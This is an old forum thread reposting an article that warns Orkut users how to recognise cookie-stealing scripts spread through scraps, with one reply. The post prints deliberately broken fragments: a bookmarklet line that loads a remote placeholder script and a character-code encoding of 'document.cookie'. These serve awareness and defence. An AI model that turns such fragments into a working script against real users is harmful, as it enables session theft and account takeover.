Username: Save?
Password:
Home Forum Links Search Login Register*
    News: Keep The TechnoWorldInc.com Community Clean: Read Guidelines Here.
Recent Updates
[September 09, 2024, 12:27:25 PM]

[September 09, 2024, 12:27:25 PM]

[September 09, 2024, 12:27:25 PM]

[September 09, 2024, 12:27:25 PM]

[August 10, 2024, 12:34:30 PM]

[August 10, 2024, 12:34:30 PM]

[August 10, 2024, 12:34:30 PM]

[August 10, 2024, 12:34:30 PM]

[July 05, 2024, 02:11:09 PM]

[July 05, 2024, 02:11:09 PM]

[July 05, 2024, 02:11:09 PM]

[June 21, 2024, 01:43:48 PM]

[June 21, 2024, 01:43:48 PM]
Subscriptions
Get Latest Tech Updates For Free!
Resources
   Travelikers
   Funistan
   PrettyGalz
   Techlap
   FreeThemes
   Videsta
   Glamistan
   BachatMela
   GlamGalz
   Techzug
   Vidsage
   Funzug
   WorldHostInc
   Funfani
   FilmyMama
   Uploaded.Tech
   MegaPixelShop
   Netens
   Funotic
   FreeJobsInc
   FilesPark
Participate in the fastest growing Technical Encyclopedia! This website is 100% Free. Please register or login using the login box above if you have already registered. You will need to be logged in to reply, make new topics and to access all the areas. Registration is free! Click Here To Register.
+ Techno World Inc - The Best Technical Encyclopedia Online! » Forum » THE TECHNO CLUB [ TECHNOWORLDINC.COM ] » Computer / Technical Issues » Internet » Websites » Social Networking - OrKutGuide.Com » Non-Technical Orkut
 How to Detect One : Is This a Cookie Stealing Script?
Pages: [1]   Go Down
  Print  
Author Topic: How to Detect One : Is This a Cookie Stealing Script?  (Read 2537 times)
Tina
Global Moderator
Elite Member
*****



Karma: 9
Offline Offline

Posts: 806

Hi Friendz...!!


View Profile WWW
How to Detect One : Is This a Cookie Stealing Script?
« Posted: July 17, 2007, 01:36:10 PM »


How to Detect One : Is This a Cookie Stealing Script?



Title would seem confusing, but we think it's time to let you know how you can detect a cookie stealing script , thus avoiding a disaster. Unfortunately, Orkut has become more of a place of misuse than a social networking site. This would in a way help you playing safe on orkut and avoid using dangerous scripts which are forwarded to you or you stumble upon in a community.



If you have a look at the screen shot, you'll notice one of my contacts sending me a scrap with a cookie stealing script. Basically he has been hacked and the hacker is now using scrap all friends to scrap all his friends who may believe that their dear friend is sending them a script and they would not hesitate to use it. This can happen to anyone of us. So it's necessary for all of us to recognize which scripts are there for our cookies.


There are 3 cookie stealing scripts on orkut at this point of time :

NOTE | These scripts have been edited to a large extent so that no one can use it.This is just a learning process thus there is no way can provide anyone with anything as such so kindly don't scrap or mail for similar requests.

The Normal Script - If you read the script carefully, you get to see the profile id of the hacker and document.cookie call which is the spine of this script.
In case you ever see a UID=123456722489 and document.cookie in a script then you must remember - Never Ever Run that script.

Url Encoded Script - This script consists of a link which is usually a user.js
javascript:increasing_members=document.get('head')[0]; a=document.xxxxElement('scrirpt'); a.src='http://anylink.js'; c.append(a); void(0)



This anylink.js refers to a grease monkey script.It may also be a tinyurl which we have discussed earlier.

Document.Cookie Encoded - This is the latest and most used script on orkut these days. Unfortunately, i have seen a lot of them in many scrapbooks and communities. Tn This Script, the cookie stealing function is coded hence not easily detectable.
String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101)


The numbers shown above when decoded show up = document.cookie . I hope you can guess what they can be used for.


We hope you support our effort and help us spread the word to reach the masses.

Source: OrkutPlus

Logged

« Reply #1 Posted: September 10, 2007, 12:21:46 AM »
Hellraiser
TWI Trailblazer
*******



Karma: 3
Offline Offline

Posts: 2476


View Profile
Re: How to Detect One : Is This a Cookie Stealing Script?
« Reply #1 Posted: September 10, 2007, 12:21:46 AM »

thanks for sharing this info..
Logged
Pages: [1]   Go Up
  Print  
 
Jump to:  

Copyright © 2006-2023 TechnoWorldInc.com. All Rights Reserved. Privacy Policy | Disclaimer
Page created in 0.068 seconds with 28 queries.